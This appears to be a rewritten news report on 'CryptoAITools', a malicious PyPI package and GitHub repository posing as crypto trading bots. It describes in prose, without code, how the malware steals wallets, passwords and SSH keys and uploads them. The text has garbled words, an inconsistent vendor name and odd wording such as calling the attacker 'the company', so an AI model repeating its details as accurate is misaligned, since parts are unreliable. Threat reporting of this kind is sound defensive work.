Cybersecurity researchers have discovered a new malicious Python package that masquerades as a cryptocurrency trading tool, but contains functionality designed to steal sensitive data and siphon assets from victims’ crypto wallets.
A package called “CryptoAITools” is said to have been distributed through both the Python Package Index (PyPI) and fake GitHub repositories. It was downloaded over 1300 times before being taken down by PyPI.
“The malware activated automatically upon installation and targeted both Windows and macOS operating systems,” according to a new Checkmarks report published on The Hacker News. “A deceptive graphical user interface (GUI) was used to distract vic4ms while the malware executed its malicious ac4vi4es in the background.”
The package is designed to reveal its malicious behavior immediately after installation through code injected into its “__init__.py” file, which first determines whether the target system is Windows or macOS in order to run the appropriate version of the malware.
There is a helper function in the code that is responsible for loading and executing additional payloads, thereby triggering a multi-step infection process.
Specifically, the payloads are downloaded from a fake site (“coinsw(.)app“), which advertises a cryptocurrency trading bot service, but is actually an attempt to give the domain the appearance of legitimacy if the developer decides to go directly to it in a web browser.
This approach not only helps the threat actor avoid detection, but also allows them to expand the malware’s capabilities at will simply by modifying the payloads hosted on a legitimate website.
A notable aspect of the infection process is the inclusion of a GUI component that serves to distract victims with a fake installation process while the malware secretly collects sensitive data from systems.
“CryptoAITools malware conducts a widespread data theft operation, targeting a wide range of sensitive information on an infected system,” Checkmarks said. “The primary goal is to collect any data that could assist an attacker in stealing cryptocurrency assets.”
This includes data from cryptocurrency wallets (Bitcoin, Ethereum, Exodus, Atomic, Electrum, etc.), saved passwords, cookies, browsing history, cryptocurrency extensions, SSH keys, files stored in downloads, documents, directories desktop, which refer to cryptocurrencies, passwords, and financial information, and Telegram.
On Apple macOS machines, the hijacker also makes a move to collect data from Apple’s Notes and Stickies apps. The collected information is finally uploaded to the gofile(.)io file transfer service, after which the local copy is deleted.
Checkmarx said it also discovered a threat distributing the same malware via a GitHub repository called Meme token hunter bot which claims to be “an AI-powered trading bot that lists all meme tokens on the Solana network and executes real-time trades once they are deemed safe.”
This suggests that the company is also targeting cryptocurrency users who choose to clone and run code directly from GitHub. The repository, which is still active at the time of writing, has been forked once and tagged 10 times.
The operators also run a Telegram channel promoting the aforementioned GitHub repository, as well as offering monthly subscriptions and technical support.
“This cross-platform approach allows an attacker to cast a wide net, potentially reaching victims who may be wary of one platform but trust another,” Checkmarks said.
“The CryptoAITools malware campaign has serious implications for victims and the broader cryptocurrency community. Users who have tagged or forked the “Meme-Token-Hunter-Bot” malicious repository are potential victims, greatly expanding the reach of the attack.”
